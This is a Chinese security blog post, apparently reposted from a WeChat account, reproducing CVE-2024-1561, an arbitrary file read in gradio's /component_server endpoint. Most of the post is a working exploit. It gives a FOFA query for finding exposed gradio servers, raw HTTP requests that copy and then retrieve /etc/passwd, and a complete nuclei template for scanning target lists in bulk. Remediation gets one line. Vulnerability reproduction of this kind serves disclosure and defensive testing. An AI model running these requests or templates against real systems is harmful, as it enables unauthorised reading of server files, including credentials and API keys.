CVE-2024-1561漏洞复现

admin
admin
admin
108455
文章
90
评论
2024年5月17日18:02:21评论33 views字数 3004阅读10分0秒阅读模式

使

01

漏洞名称

gradio任意文件读取漏洞

02

漏洞影响

gradio 版本不详

开源地址

https://github.com/gradio-app/gradio

03

漏洞描述

gradio是一个开源的用于构建和共享机器学习应用的项目,gradio的`/component_server`端点不正确地允许使用攻击者控制的参数调用`Component`类的任何方法。具体来说,通过利用`Block`类的`move_resource_to_block_cache()`方法,攻击者可以将文件系统上的任何文件复制到临时目录,然后检索它。该漏洞允许未经授权的本地文件读取访问,尤其是当应用程序通过`launch(share=True)`暴露到互联网时,从而允许远程攻击者读取主机机器上的文件。此外,托管在`huggingface.co`上的gradio应用也受到影响,可能导致敏感信息,如存储在环境变量中的API密钥和凭据的泄露。

04

FOFA搜索语句
body="__gradio_mode__"

CVE-2024-1561漏洞复现

05

漏洞复现

第一步,请求/config文件获取componets的id

http://x.x.x.x/config

CVE-2024-1561漏洞复现

第二步,将/etc/passwd的内容写入到一个临时文件

POST /component_server HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3Connection: closeContent-Length: 115Content-Type: application/jsonAccept-Encoding: gzip{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

响应数据包如下,body中返回了文件路径

HTTP/1.1 200 OKConnection: closeContent-Length: 61Content-Type: application/jsonDate: Fri, 17 May 2024 01:45:07 GMTServer: uvicorn"/tmp/gradio/422ecef943a375e44ed4c28405458cdf49755073/passwd"

第三步,访问这个文件

http://x.x.x.x/file=/tmp/gradio/422ecef943a375e44ed4c28405458cdf49755073/passwd

CVE-2024-1561漏洞复现

漏洞复现成功

06

nuclei poc

poc文件内容如下

id: CVE-2024-1561info:  name: Gradio Applications - Local File Read  author: Diablo  severity: high  description: |    Local file read by calling arbitrary methods of Components class  impact: |    Successful exploitation of this vulnerability could allow an attacker to read files on the server  remediation: |    Update to Gradio 4.13.0  reference:    - https://huntr.com/bounties/4acf584e-2fe8-490e-878d-2d9bf2698338    - https://github.com/DiabloHTB/CVE-2024-1561    - https://nvd.nist.gov/vuln/detail/CVE-2024-1561    - https://github.com/gradio-app/gradio/commit/24a583688046867ca8b8b02959c441818bdb34a2  classification:    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N    cvss-score: 7.5    cve-id: CVE-2024-1561    cwe-id: CWE-29    epss-score: 0.00045    epss-percentile: 0.14639  metadata:    verified: true    max-request: 3    shodan-query: html:"__gradio_mode__"  tags: cve,cve2024,intrusive,unauth,gradio,lfi,lfrflow: http(1) && http(2) && http(3)http:  - raw:      - |        GET /config HTTP/1.1        Host: {{Hostname}}    extractors:      - type: json        name: first-component        part: body        group: 1        json:          - '.components[0].id'        internal: true  - raw:      - |        POST /component_server HTTP/1.1        Host: {{Hostname}}        Content-Type: application/json        {"component_id": "{{first-component}}","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}    extractors:      - type: regex        name: tmpath        regex:          - /[a-zA-Z0-9/]+        internal: true  - raw:      - |        GET /file={{tmpath}} HTTP/1.1        Host: {{Hostname}}    matchers:      - type: dsl        dsl:          - regex('root:.*:0:0:', body)          - 'contains(header, "text/plain")'        condition: and# digest: 490a004630440220321f22e77b20acc61afa7b5cbf1f465becdb09178d7c23342a1d1be0a11c843502205a9d96fc3f2429ce7f2566dce2a289b2ff6529266cee50a0d24bd60336562f19:922c64590222798bb761d5b6d8e72950

运行POC

nuclei.exe -t mypoc/cve/CVE-2024-1561.yaml -l data2.txt

CVE-2024-1561漏洞复现

07

修复建议

建议您更新当前系统或软件至最新版,完成漏洞的修复。

原文始发于微信公众号(AI与网安):CVE-2024-1561漏洞复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月17日18:02:21
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-1561漏洞复现https://cn-sec.com/archives/2750149.html

发表评论

匿名网友 填写信息